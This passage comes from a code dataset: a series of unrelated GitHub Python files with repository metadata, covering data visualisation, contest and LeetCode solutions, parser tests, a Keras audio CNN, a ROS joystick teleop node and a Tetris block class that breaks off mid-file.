cur.execute(\"\"\" SELECT DISTINCT Counties.county, Crashes.num_fatal_crashes, Total_Snowfall.snow_inches, Avg_Temp.temp_f\n FROM Counties INNER JOIN Crashes ON Counties.id = Crashes.county_id INNER JOIN Total_Snowfall ON \n Counties.id = Total_Snowfall.county_id INNER JOIN Avg_Temp on Counties.id = Avg_Temp.county_id\"\"\")\n results = cur.fetchall()\n return results\n\n\ndef visualization(lst_tups):\n \"\"\"\n Takes in a list of tuples with corresponding snowfall inches, fatal car crashes, average temperature, and county name\n for each Illinois county in alphabetical order as inputs and returns nothing. Creates a scatterplot where the snowfall\n is x-axis and fatalities is y-axis. Also creates a bar chart where the temperature is x-axis and fatalities is y-axis\n \"\"\"\n snowfall = []\n crashes = []\n temp = []\n name = []\n\n for t in lst_tups: \n snowfall.append(t[2])\n crashes.append(t[1])\n temp.append(t[3])\n name.append(t[0])\n\n\n\n\n\n title_str = \"Relationship between Total Snowfall and Car Crash Fatalities in Illinois in 2019\"\n title_str2 = \"Relationship between Average Temperature and Car Crash Fatalities in Illinois in 2019\"\n\n #barchart\n\n fig = go.Figure()\n\n fig.add_trace(go.Scatter(\n x=snowfall,\n y=crashes,\n hoverinfo = \"text\",\n hovertext=name,\n marker=dict(color=\"rgb(64, 60, 94)\", size=10),\n mode=\"markers\",\n name=\"Snowfall and Car Crash Fatalities\",\n ))\n\n fig.update_layout(title = title_str,\n xaxis_title=\"Total Snowfall (inches)\", yaxis_title=\"Fatal Car Crashes\")\n \n fig.show() \n\n\n\n #scatterplot\n\n fig2 = go.Figure([go.Bar(x=temp, y=crashes)])\n fig2.update_traces(marker_color=\"rgb(123, 164, 224)\", marker_line_color=\"rgb(12, 62, 133)\", marker_line_width=2, width=.05, hoverinfo = \"text\",\n hovertext=name)\n fig2.update_layout(title_text = title_str2, xaxis_title=\"Average Temperature (F)\", yaxis_title=\"Fatal Car Crashes\")\n fig2.show()\n\n\ndef write_calculations(filename, curr, conn):\n \"\"\"\n Takes in a filename (string), the database cursor, and the database connections as inputs. Creates a file, selects from database,\n and writes the total population, total amount of fatal car crashes, total snowfall (in), and average temperature in Illinois in \n 2019 to the file. Returns nothing. \n \"\"\"\n path = os.path.dirname(os.path.abspath(__file__)) + os.sep\n #Writes the results of the average_followers_per_song() function to a file.\n outFile = open(path + filename, \"w\")\n outFile.write(\"Total population, total amount of fatal car crashes, total snowfall (in), and average temperature in Illinois in 2019\\n\")\n outFile.write(\"=======================================================================\\n\\n\")\n\n\n curr.execute(\"SELECT population FROM Counties\")\n population = curr.fetchall()\n\n total_pop = 0\n for p in population:\n total_pop = total_pop + p[0]\n\n outFile.write(\"The total population in Illinois in 2019: \" + str(total_pop) + '\\n' + '\\n')\n\n\n curr.execute(\"SELECT num_fatal_crashes FROM Crashes\")\n crashes = curr.fetchall()\n\n total_crashes = 0\n for c in crashes:\n total_crashes = total_crashes + c[0]\n\n outFile.write(\"The total number of fatal crashes in Illinois in 2019: \" + str(total_crashes) + '\\n' + '\\n')\n\n\n curr.execute(\"SELECT snow_inches FROM Total_Snowfall\")\n snow = curr.fetchall()\n\n total_snowfall = 0\n for s in snow:\n total_snowfall = total_snowfall + s[0]\n\n outFile.write(\"The total amount of snowfall (inches) in Illinois in 2019: \" + str(total_snowfall) + '\\n' + '\\n')\n\n\n curr.execute(\"SELECT temp_f FROM Avg_Temp\")\n temps = curr.fetchall()\n\n total_temp = 0\n for t in temps:\n total_temp = total_temp + t[0]\n\n outFile.write(\"The average temperature (Fahrenheit) in Illinois in 2019: \" + str(total_temp/len(temps)) + '\\n' + '\\n')\n\ndef main():\n \"\"\"\n Takes no inputs and returns nothing. Creates tables and selects data from database in order to create visualaztions (2 graphs).\n \"\"\"\n\n\n curr, conn = setUpDatabase('Weather_Crash_Data_Illinois.db')\n setUpSnowTable(\"Snow_Data.json\", curr, conn)\n setUpTempTable(\"Temp_Data.json\", curr, conn)\n\n\n str_snow = \"Snow_Data_pt\"\n\n i = 2\n for count in range(4):\n count = 2 + count\n str_final = str_snow + str(count)+ \".json\"\n setUpSnowTable(str_final, curr, conn)\n\n str_temp = \"Temp_Data_pt\"\n j = 2\n for cont in range(4):\n cont = j + cont\n str_fin = str_temp + str(cont) + \".json\"\n setUpTempTable(str_fin, curr, conn)\n \n \n\n write_calculations(\"total-amounts.txt\", curr, conn)\n\n\n lst_tups = summary_for_scatterplot(curr, conn)\n visualization(lst_tups) \n\n\nif __name__ == '__main__':\n main()","repo_name":"juliareel/final-project-206","sub_path":"visualization2.py","file_name":"visualization2.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31860916175","text":"\"\"\"\n ID: actuato2\n LANG: PYTHON3\n TASK: crypt1\n\"\"\"\ndef checkFit(Set, InsertList, PartorProd):\n Set = list(tuple(sorted(Set)))\n for i in Set:\n if i in InsertList:\n if PartorProd == 0 and len(Set) == 3:\n continue\n elif PartorProd == 1 and len(Set) == 4:\n continue\n else:\n return False\n else:\n return False\n return True\n\ndef getProduct(f1, f2):\n if type(f1) == list:\n f1 = int(''.join(map(str, f1)))\n if type(f2) == list:\n f2 = int(''.join(map(str, f2)))\n return [int(d) for d in str(f1*f2)]\n\n\n\nwith open(\"crypt1.in\") as fInput:\n lines = fInput.readlines()\n\nacceptedNums = sorted([int(i) for i in lines[1].strip().split()])\nfactor1 = []\nfactor2 = []\npartialProduct1 = []\npartialProduct2 = []\nproduct = []\nsolutions = 0\n\nfor m in acceptedNums:\n for y in acceptedNums:\n factor2 = [m, y]\n for i in acceptedNums:\n for e in acceptedNums:\n for x in acceptedNums:\n factor1 = [i,e,x]\n partialProduct1 = getProduct(factor1, factor2[0])\n partialProduct2 = getProduct(factor1, factor2[1])\n product = getProduct(factor1, factor2)\n if checkFit(partialProduct1, acceptedNums, 0) and checkFit(partialProduct2, acceptedNums, 0) and checkFit(product, acceptedNums, 1):\n solutions += 1\n print(str(factor1)+str(factor2)+str(partialProduct1)+str(partialProduct2)+str(product) )\n\nwith open(\"crypt1.out\", 'w') as fOutput:\n fOutput.write(str(solutions)+'\\n')","repo_name":"blackmagic919/USACO","sub_path":"training/Chapter_1/Section 1.3/crypt1/crypt1.py","file_name":"crypt1.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"234338631","text":"\"\"\"Test suite for parse_config function.\"\"\"\n\nfrom pathlib import Path\n\nfrom gatorgrade.input.checks import GatorGraderCheck\nfrom gatorgrade.input.checks import ShellCheck\nfrom gatorgrade.input.parse_config import parse_config\n\n\ndef test_parse_config_gg_check_in_file_context_contains_file():\n \"\"\"Test to make sure that the file context is included in the GatorGrader arguments.\"\"\"\n # Given a configuration file with a GatorGrader check within a file context\n config = Path(\"tests/input/yml_test_files/gatorgrade_one_gg_check_in_file.yml\")\n # When parse_config is run\n output = parse_config(config)\n # Then the file path should be in the GatorGrader arguments\n assert \"file.py\" in output[0].gg_args\n\n\ndef test_parse_config_check_gg_matchfilefragment():\n \"\"\"Test to make sure the description, check name, and options appear in the GatorGrader arguments.\"\"\"\n # Given a configuration file with a GatorGrader check\n config = Path(\"tests/input/yml_test_files/gatorgrade_matchfilefragment.yml\")\n # When parse_config is run\n output = parse_config(config)\n # Then the description, check name, and options appear in the GatorGrader arguments\n assert output[0].gg_args == [\n \"--description\",\n \"Complete all TODOs\",\n \"MatchFileFragment\",\n \"--fragment\",\n \"TODO\",\n \"--count\",\n \"0\",\n \"--exact\",\n \"--directory\",\n \"path/to\",\n \"--file\",\n \"file.py\",\n ]\n\n\ndef test_parse_config_gg_check_no_file_context_contains_no_file():\n \"\"\"Test to make sure checks without a file context do not have a file path in GatorGrader arguments.\"\"\"\n # Given a configuration file with a GatorGrader check without a file context\n config = Path(\n \"tests/input/yml_test_files/gatorgrade_one_gg_check_no_file_context.yml\"\n )\n # When parse_config is run\n output = parse_config(config)\n # Then the GatorGrader arguments do not contain a file path\n assert output[0].gg_args == [\n \"--description\",\n \"Have 8 commits\",\n \"CountCommits\",\n \"--count\",\n \"8\",\n ]\n\n\ndef test_parse_config_parses_both_shell_and_gg_checks():\n \"\"\"Test to make sure that both shell and GatorGrader checks are parsed.\"\"\"\n # Given a configuration file that contains a shell check and GatorGrader check\n config = Path(\"tests/input/yml_test_files/gatorgrader_both_checks.yml\")\n # When parse_config is run\n output = parse_config(config)\n # Then the output should contain a shell check and GatorGrader check\n assert isinstance(output[0], GatorGraderCheck)\n assert isinstance(output[1], ShellCheck)\n\n\ndef test_parse_config_yml_file_runs_setup_shell_checks():\n \"\"\"Test to make sure that a configuration file without setup commands can be parsed.\"\"\"\n # Given a configuration file without setup commands\n config = Path(\"tests/input/yml_test_files/gatorgrade_no_shell_setup_check.yml\")\n # When parse_config run\n output = parse_config(config)\n # Then the output should contain the GatorGrader check\n assert output[0].gg_args == [\n \"--description\",\n \"Have 8 commits\",\n \"CountCommits\",\n \"--count\",\n \"8\",\n ]\n\n\ndef test_parse_config_shell_check_contains_command():\n \"\"\"Test to make sure that the command for a shell check is stored.\"\"\"\n # Given a configuration file with a shell check\n config = Path(\"tests/input/yml_test_files/gatorgrade_one_shell_command_check.yml\")\n # When the parse_config is run\n output = parse_config(config)\n # Then the command should be stored in the shell check\n assert output[0].command == \"mdl .\"\n","repo_name":"GatorEducator/gatorgrade","sub_path":"tests/input/test_input_gg_checks.py","file_name":"test_input_gg_checks.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"73577313207","text":"import matplotlib.pyplot as plt\nimport mtcnn\nimport argparse\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"image_path\", help=\"The path to the image to use.\")\nparser.add_argument(\"show_image\", help=\"(True or False) Whether or not to display the image.\")\n\nargs = parser.parse_args()\n\nif __name__ == \"__main__\":\n\ttry:\n\t\timg = plt.imread(args.image_path)\n\texcept Exception as e:\n\t\tprint(\"\\t[-] Fatal Error: {}\".format(e))\n\t\tsys.argv(-1)\n\n\tmodel = mtcnn.MTCNN()\n\tfaces = model.detect_faces(img)\n\n\tplt.imshow(img)\n\n\tfor face in faces:\n\t\tconfidence = face['confidence']\n\n\t\tax = plt.gca()\n\n\t\tif confidence >= 0.8:\n\t\t\tx, y, width, height = face['box']\n\t\t\trect = plt.Rectangle((x, y), width * 1.1, height * 1.1, fill=False, color='red')\n\t\t\tax.add_patch(rect)\n\n\tplt.show()","repo_name":"jweir136/MTCNN-Test-1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70491235770","text":"\n# Space: O(n)\n# Time: O(n)\n\nimport random\n\n\nclass RandomizedSet:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.data = set()\n self.list = []\n self.length = 0\n\n def insert(self, val: int) -> bool:\n \"\"\"\n Inserts a value to the set. Returns true if the set did not already contain the specified element.\n \"\"\"\n\n if val not in self.data:\n self.data.add(val)\n self.list.append(val)\n self.length += 1\n return True\n return False\n\n def remove(self, val: int) -> bool:\n \"\"\"\n Removes a value from the set. Returns true if the set contained the specified element.\n \"\"\"\n if val in self.data:\n self.data.remove(val)\n self.list.remove(val)\n self.length -= 1\n return True\n return False\n\n def getRandom(self) -> int:\n \"\"\"\n Get a random element from the set.\n \"\"\"\n random_number = random.randint(0, self.length - 1)\n return self.list[random_number]\n\n\n\n\n\n","repo_name":"lht19900714/Leetcode_Solutions","sub_path":"Algorithms/0380_Insert_Delete_GetRandom_O(1)/Python/Insert_Delete_GetRandom_O(1)_Solution_1.py","file_name":"Insert_Delete_GetRandom_O(1)_Solution_1.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42415053171","text":"from django.urls import path\n\nfrom task.views import TaskListCreateView, TaskListView, TaskDetailDestroyView, TaskUpdateView, \\\n switch_complete, switch_tomorrow\n \nfrom task.views import TaskSearchListView, TaskSearchDateListView, TaskSearchDetailDestroyView\n\nurlpatterns = [\n path('list', TaskListView.as_view()),\n path('list/', TaskListCreateView.as_view()),\n path('detail/', TaskDetailDestroyView.as_view()),\n path('detail//update', TaskUpdateView.as_view()),\n path('detail//check', switch_complete),\n path('detail//delay', switch_tomorrow),\n \n path('search//list', TaskSearchListView.as_view()),\n path('search//list/', TaskSearchDateListView.as_view()),\n path('search//detail/', TaskSearchDetailDestroyView.as_view()),\n]\n\n #path('list/repeated', TaskListCreateView.as_view()),\n #path('task/repeated/')\n \n \n","repo_name":"wafflestudio20-5/team6-server","sub_path":"toDoMateProject/task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"72478656248","text":"def solution(distance, rocks, n):\n rocks.sort()\n start, end = 1, distance\n while start <= end:\n middle = (start + end) // 2\n print(\"=========================================\\n\", \"middle:\", middle)\n pre_rock = 0\n count_rock = 0\n mins = float('inf')\n for rock in rocks:\n print(\"\\nrock:\", rock)\n print(rock - pre_rock)\n if middle > rock - pre_rock:\n count_rock += 1\n print(\"count_rock: \", count_rock)\n else:\n mins = min(mins, rock - pre_rock)\n pre_rock = rock\n print(\"pre_rock: \", pre_rock)\n if count_rock > n:\n end = middle - 1\n else:\n answer = mins\n start = middle + 1\n return answer\n\n# def solution(distance, rocks, n):\n# rocks.sort()\n# rocks.append(distance)\n# left, right = 0, distance\n# # 바위 사이의 최소거리보다 거리가 작을 경우 돌 삭제.\n# # 거리가 클 경우, 이 값들 중 최솟값을 구해둔다.\n# answer = 0\n# while left <= right:\n# # 이전 돌\n# prev = 0\n# # 돌 거리 최솟값.\n# mins = float(\"inf\")\n# # 제거한 돌 개수\n# removed_rocks = 0\n#\n# # 바위 사이의 최소거리\n# mid = (left + right) // 2\n# # 각 돌을 돌면서 제거할 돌을 찾는다.\n# for i in range(len(rocks)):\n# if rocks[i] - prev < mid:\n# removed_rocks += 1\n# else:\n# mins = min(mins, rocks[i] - prev)\n# prev = rocks[i]\n#\n# # 제거한 돌 개수가 기준보다 많다 = 바위 제거를 줄여야 한다.\n# # 바위 사이 최소거리의 기준을 낮춰야 한다\n# if removed_rocks > n:\n# right = mid - 1\n#\n# # 제거한 돌 개수가 기준보다 적다 = 더 많은 바위 제거가 필요\n# # = 바위 사이 최소거리 기준을 높여야 한다\n# else:\n# answer = mins\n# left = mid + 1\n# return answer\n\nprint(solution(26, [2, 5, 14, 17, 23, 24], 3))\n","repo_name":"eehwan/Algorithm-solutions","sub_path":"Programmers/이분탐색/징검다리.py","file_name":"징검다리.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15774721560","text":"# Load the pre-processed dataset and create data splits\n# Build our own CNN model then train and evaluate it with the data splits\n\nimport json as js\nimport numpy as np\nimport tensorflow as tf\nfrom keras import models\nfrom sklearn.model_selection import train_test_split # Traditional Machine-Learning library\nfrom tensorflow import keras # Use Keras front-end of TensorFlow for modelling\n\nJSON_PATH = \"../preprocess/data.json\" # Pre-processed dataset\nMODEL_PATH = \"models/model.h5\" # Keras model\nTEST_PATH = \"models/tested_model.h5\"\nTRAIN_PATH = \"models/validated_model.h5\"\n\nBATCH_SIZE = 24 # Number of samples the network will see before updating\nDROPOUT = 0.25 # Drops 25% of neurons in the dense layer, forces adaptation\nEPOCHS = 50 # The amount of times the network models the dataset for training\nLEARNING_RATE = 0.0001 # Optimisation Algorithm - Adam\nNUM_KEYWORDS = 22 # Number of mappings in the dataset\n\n\ndef load_dataset(data_path):\n # Load the pre-processed dataset\n with open(data_path, \"r\") as fp:\n data = js.load(fp)\n\n # Extract inputs and targets (Pylists to Numpy arrays)\n X = np.array(data[\"MFCCs\"])\n y = np.array(data[\"labels\"])\n\n return X, y\n\n\ndef get_data_splits(data_path, test_size=0.1, test_validation=0.1):\n # 10% of dataset used for testing purposes\n # 90% of dataset used with X_train and Y_train\n X, y = load_dataset(data_path)\n\n # Create 'train, validation and test' data splits (2-Dimensional array)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size)\n X_train, X_validation, y_train, y_validation = train_test_split(X_train, y_train,\n test_size=test_validation)\n\n # Convert inputs from 2-Dimensional to 3-Dimensional array\n X_train = X_train[..., np.newaxis] # (# segments, 13, 1)\n X_validation = X_validation[..., np.newaxis]\n X_test = X_test[..., np.newaxis]\n\n return X_train, X_validation, X_test, y_train, y_validation, y_test\n\n\ndef build_model(input_shape, learning_rate=LEARNING_RATE, error=\"sparse_categorical_crossentropy\"): # SCC\n # Initialise network\n model = keras.Sequential() # Create a sequential model, convolutional neural network (feed-forward)\n\n # Conv layer 1\n # (# number of filters, # kernel size, # activation, # input shape of first layer, # overfitting)\n model.add(keras.layers.Conv2D(64, (3, 3), activation=\"relu\",\n input_shape=input_shape,\n kernel_regularizer=keras.regularizers.l2(0.001)))\n\n # Normalise, MaxPooling layer 1\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.MaxPool2D((3, 3), strides=(2, 2), padding=\"same\"))\n\n # Conv layer 2\n model.add(keras.layers.Conv2D(32, (3, 3), activation=\"relu\",\n kernel_regularizer=keras.regularizers.l2(0.001)))\n\n # Normalise, MaxPooling layer 2\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.MaxPool2D((3, 3), strides=(2, 2), padding=\"same\"))\n\n # Conv layer 3\n model.add(keras.layers.Conv2D(32, (2, 2), activation=\"relu\",\n kernel_regularizer=keras.regularizers.l2(0.001)))\n\n # Normalise, MaxPooling layer 3\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.MaxPool2D((2, 2), strides=(2, 2), padding=\"same\"))\n\n # Flatten output of convolutional layers, forward-feed into dense layer then dropout percentage of neurons\n model.add(keras.layers.Flatten())\n model.add(keras.layers.Dense(64, activation=\"relu\"))\n model.add(keras.layers.Dropout(DROPOUT))\n\n # SoftMax classifier\n model.add(keras.layers.Dense(NUM_KEYWORDS, activation=\"softmax\")) # Prediction score [0.1, 0.7, 0.2]\n\n # Compile the model by Keras\n optimizer = keras.optimizers.Adam(learning_rate=learning_rate)\n\n model.compile(\n optimizer=optimizer,\n loss=error,\n metrics=[\"accuracy\"]\n )\n\n # Model statistics overview\n model.summary()\n return model\n\n\ndef main():\n print(\"Loading data splits..\")\n # Load data splits\n X_train, X_validation, X_test, y_train, y_validation, y_test = get_data_splits(JSON_PATH)\n\n print(\"Building CNN model..\")\n # Build CNN model\n # Equally spaced segments = total amount of sample sets / hop length\n # (#segments, # coefficients 13, # information channel of an image, 1)\n input_shape = (X_train.shape[1], X_train.shape[2], X_train.shape[3]) # CNN takes a 3-Dimensional input\n model = build_model(input_shape, LEARNING_RATE)\n\n print(\"Training initial CNN model..\")\n # Train CNN model\n model.fit(X_train, y_train, epochs=EPOCHS, batch_size=BATCH_SIZE,\n validation_data=(X_validation, y_validation))\n\n print(\"Saving initial CNN model..\")\n # Save CNN model\n model.save(MODEL_PATH)\n\n print(\"Loading test CNN model..\")\n # Load CNN model\n test = models.load_model(MODEL_PATH)\n\n print(\"Evaluating test CNN model..\")\n # Evaluate to test the CNN model\n results = test.evaluate(X_test, tf.cast(y_test, tf.float32), batch_size=BATCH_SIZE)\n test_error, test_accuracy = test.evaluate(X_test, y_test)\n print(f\"Test Error: {test_error}, Test Accuracy: {test_accuracy}\")\n\n print(\"Saving test CNN model..\")\n # Save tested CNN model\n test.save(TEST_PATH)\n\n print(\"Loading train CNN model..\")\n # Load CNN test model\n train = models.load_model(TEST_PATH)\n\n print(\"Combining data splits..\")\n # Fully train the CNN test model\n complete_train_X = np.concatenate((X_train, X_validation, X_test))\n complete_train_Y = np.concatenate((y_train, y_validation, y_test))\n\n print(\"Shuffling combined data split for data augmentation..\")\n complete_train_dataset = tf.data.Dataset.from_tensor_slices((complete_train_X, complete_train_Y))\\\n .repeat(count=-1)\\\n .shuffle(100000).batch(BATCH_SIZE)\n\n print(\"Fully training the train CNN model..\")\n history = train.fit(\n complete_train_dataset,\n steps_per_epoch=len(complete_train_X) // BATCH_SIZE,\n epochs=10\n )\n\n print(\"Fully trained model evaluation..\")\n # Evaluate to test the trained CNN model\n results = train.evaluate(X_test, tf.cast(y_test, tf.float32), batch_size=BATCH_SIZE)\n test_error, test_accuracy = train.evaluate(X_test, y_test)\n print(f\"Test Error: {test_error}, Test Accuracy: {test_accuracy}\")\n\n print(\"Fully trained CNN model..\")\n # Save fully-trained CNN model\n train.save(TRAIN_PATH)\n\n print(\"Finished.\")\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"stormy99/SheilaAI","sub_path":"devel/process/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70663395450","text":"#! /usr/bin/python\nimport psutil\nimport rospy\nimport subprocess, os, signal\n\nfrom std_msgs.msg import Float64\nfrom sensor_msgs.msg import Joy\n\ndef terminate_process_and_children(p):\n process = psutil.Process(p.pid)\n for sub_process in process.children(recursive=True):\n sub_process.send_signal(signal.SIGINT)\n p.wait() # we wait for children to terminate\n #p.terminate()\n\nclass CarTelop:\n\n def __init__(self):\n ''' '''\n\n # VESC publishers intialization\n self.pub_steer = rospy.Publisher(\"commands/servo/position\",Float64, queue_size = 100)\n self.pub_throttle = rospy.Publisher(\"commands/motor/duty_cycle\", Float64, queue_size = 100)\n self.pub_speed = rospy.Publisher(\"commands/motor/speed\", Float64, queue_size = 100)\n self.joy0_sub = rospy.Subscriber(\"/j0/joy\", Joy, self.joyListenerCallback)\n\n # intialze steering value\n steering_angle = 0.5\n rospy.loginfo(steering_angle)\n self.pub_steer.publish(steering_angle)\n\n # setting up the recording for the rosbag\n self.command = \"rosbag record /rgb/image_raw_color /commands/motor/duty_cycle /commands/servo/position /commands/motor/duty_cycle\"\n self.rosbag_rec = False\n\n rospy.loginfo(\"intializing\")\n # waiting to make sure the all the processes start\n rate = rospy.Rate(2)\n rate.sleep()\n rate.sleep()\n\n self.rcCarTelop()\n\n\n def rcCarTelop(self):\n ''' '''\n # changing rate\n rate = rospy.Rate(10)\n rospy.loginfo(\"starting\")\n\n while not rospy.is_shutdown():\n rate.sleep()\n\n\n def joyListenerCallback(self,data):\n\n acc_multiplier_1 = 1\n acc_multiplier_2 = 1\n\n if data.buttons[6] == 1:\n # acceleration multiplier\n acc_multiplier_1 = 5\n if data.buttons[4] == 1:\n # acceleration multiplier\n acc_multiplier_2 = 2\n if data.buttons[0] == 1 and self.rosbag_rec == False:\n # start recording the bags\n rospy.loginfo(\"start recording the bag file\")\n self.rosbag_process = subprocess.Popen(self.command,shell=True, stdout=subprocess.PIPE)\n self.rosbag_rec = True\n if data.buttons[3] == 1 and self.rosbag_rec == True:\n # reset car and stop recording\n # intialze steering value\n # steering_angle = 0.5\n # #rospy.loginfo(\"steering_angle = 0\")\n # self.pub_steer.publish(steering_angle)\n # # stoping the car\n # #rospy.loginfo(\"speed = 0\")\n # self.pub_speed.publish(0)\n # # terminate the rosbag collection\n rospy.loginfo(\"terminating recording the bag file\")\n terminate_process_and_children(self.rosbag_process)\n self.rosbag_rec = False\n if data.buttons[1] == 1:\n # stop and reset car\n # intialze steering value\n steering_angle = 0.5\n # rospy.loginfo(\"steering_angle = 0\")\n self.pub_steer.publish(steering_angle)\n # stoping the car\n # rospy.loginfo(\"speed = 0\")\n self.pub_speed.publish(0)\n\n duty_cycle_value = 0.1 * data.axes[1] * acc_multiplier_1 * acc_multiplier_2\n steering_value = 0.5 - 0.4 * data.axes[2]\n\n log_text = \"steering_angle = \" + str(steering_value) + \" throttle_value = \" + \\\n str(duty_cycle_value)\n\n # rospy.loginfo(log_text)\n self.pub_throttle.publish(duty_cycle_value)\n self.pub_steer.publish(steering_value)\n\n\nif __name__=='__main__':\n try:\n # init ros node\n rospy.init_node('rc_car_telop')\n car_telop = CarTelop()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"chaitanyarajasekhar/rccar_telop","sub_path":"src/telop_joy.py","file_name":"telop_joy.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10713599543","text":"#!/usr/bin/env python\r\n\r\nimport getpass\r\n\r\nname = 'anne'\r\ncolor ='red'\r\nval = 27\r\n\r\n\r\nprint(name, color, val)\r\nprint(name, color, val, sep='.')\r\nprint(f\"My name is {name} and fav color is {color}\")\r\nprint('name', end=\"=>\") #no carriage retrun, \\n is by default\r\nprint(name)\r\n\r\n# must remember to open and close\r\nmary_in = open('DATA/mary.txt') #file object #personal preference to _in for reading and _out for outptu\r\nfor raw_lin in mary_in:\r\n raw_lin= raw_lin.rstrip()\r\n print(raw_lin)\r\nmary_in.close()\r\n\r\n#opens and closes\r\nwith open('DATA/mary.txt') as mary_in:\r\n for raw_lin in mary_in:\r\n raw_lin = raw_lin.rstrip()\r\n print(raw_lin)\r\n\r\nprint(\"***READ***\")\r\nwith open('DATA/mary.txt') as mary_in:\r\n contents = mary_in.read()\r\n print(contents)\r\n\r\nwith open('DATA/mary.txt') as mary_in:\r\n lines = mary_in.readlines() #bad for larger files as all lines get loaded to memory\r\n\r\nfruits = ['apple', 'orange', 'dragonfruit']\r\nwith open('fruits.txt', 'w') as fruits_out:\r\n for fruit in fruits:\r\n fruits_out.write(fruit + '\\n')\r\n\r\n#ask user\r\nfull_name = input(\"Pleas enter your full name?\")\r\nnames = full_name.split()\r\nif (len(names) < 2):\r\n full_name = input(\"thats not your full name, try again:\")\r\n\r\n#password stuff\r\n#password = getpass.getpass(\"Enterpassword:\")","repo_name":"waiteb15/py3forsci3day","sub_path":"io_ex.py","file_name":"io_ex.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14384077686","text":"import random\r\nnum = random.randint(1,10)\r\n\r\nans = int(input('1~10:'))\r\nif num==ans:\r\n print('you guessed it, unlike emily the noob')\r\nelse: \r\n print('you are just like emily-a noob, the answer was',num)\r\n6\r\n ","repo_name":"D4RKFORCE7/python-2020-8","sub_path":"stupid 4.py","file_name":"stupid 4.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27643308264","text":"# link => https://leetcode.com/problems/the-k-weakest-rows-in-a-matrix/\n\nimport heapq\n\n\nclass Solution:\n # using max heap\n def kWeakestRows(self, mat, k):\n\n res = []\n\n for i, row in enumerate(mat):\n\n sum_ = sum(row)\n heapq.heappush(res, (-sum_, -i))\n if len(res) > k:\n heapq.heappop(res)\n\n ans = []\n while res:\n ans.insert(0, -heapq.heappop(res)[1])\n\n return ans\n\n '''\n def kWeakestRows(self, mat, k):\n\n # by sorting\n for i in range(len(mat)):\n mat[i].append(i)\n\n mat.sort(key=lambda x: sum(x[:-1]))\n\n return [mat[i][-1] for i in range(k)]\n '''\n\n\nprint(Solution().kWeakestRows([[1, 0, 0, 0],\n [1, 1, 1, 1],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 1, 0, 0],\n [1, 1, 1, 0]], 3))\n","repo_name":"simba28/daily-codes","sub_path":"KWeakestRowsInMatrix.py","file_name":"KWeakestRowsInMatrix.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23207054366","text":"import pygame\n\n\nclass Block:\n def __init__(self, board, screen):\n self.board = board\n self.screen_grid = board.grid\n self.screen = screen\n self.block_size = self.board.cell_size\n self.grid_x = 3\n self.grid_y = -1\n self.locked = False\n self.rotation_index = 0\n self.rotation_test = {\n 0: {\n 1: [(0, 0), (-1, 0), (-1, 1), (0, -2), (-1, -2)],\n 3: [(0, 0), (1, 0), (1, 1), (0, -2), (1, -2)],\n },\n 1: {\n 0: [(0, 0), (1, 0), (1, -1), (0, 2), (1, 2)],\n 2: [(0, 0), (1, 0), (1, -1), (0, 2), (1, 2)],\n },\n 2: {\n 1: [(0, 0), (-1, 0), (-1, 1), (0, -2), (-1, -2)],\n 3: [(0, 0), (1, 0), (1, 1), (0, -2), (1, -2)],\n },\n 3: {\n 2: [(0, 0), (-1, 0), (-1, -1), (0, 2), (-1, 2)],\n 0: [(0, 0), (-1, 0), (-1, -1), (0, 2), (-1, 2)],\n }\n }\n\n def get_block_grid(self):\n return self.rotations[self.rotation_index]\n\n def reset(self):\n self.grid_x = 3\n self.grid_y = -1\n self.rotation_index = 0\n\n def hard_drop(self):\n while self.can_move_down():\n self.move_down()\n self.locked = True\n\n def is_blocked_out(self):\n return not self.can_move(self.grid_x, self.grid_y, self.get_block_grid())\n\n # rotation\n def rotate_cw(self):\n target_rotation_index = (self.rotation_index + 1) % 4\n kick = self.can_rotate(target_rotation_index)\n if kick:\n self.grid_x += kick[0]\n self.grid_y += kick[1]\n self.rotation_index = target_rotation_index\n return True\n else:\n return False\n\n def rotate_ccw(self):\n target_rotation_index = (self.rotation_index - 1) % 4\n kick = self.can_rotate(target_rotation_index)\n if kick:\n self.grid_x += kick[0]\n self.grid_y += kick[1]\n self.rotation_index = target_rotation_index\n return True\n else:\n return False\n\n def can_rotate(self, target_rotation_index):\n temp_piece_grid = 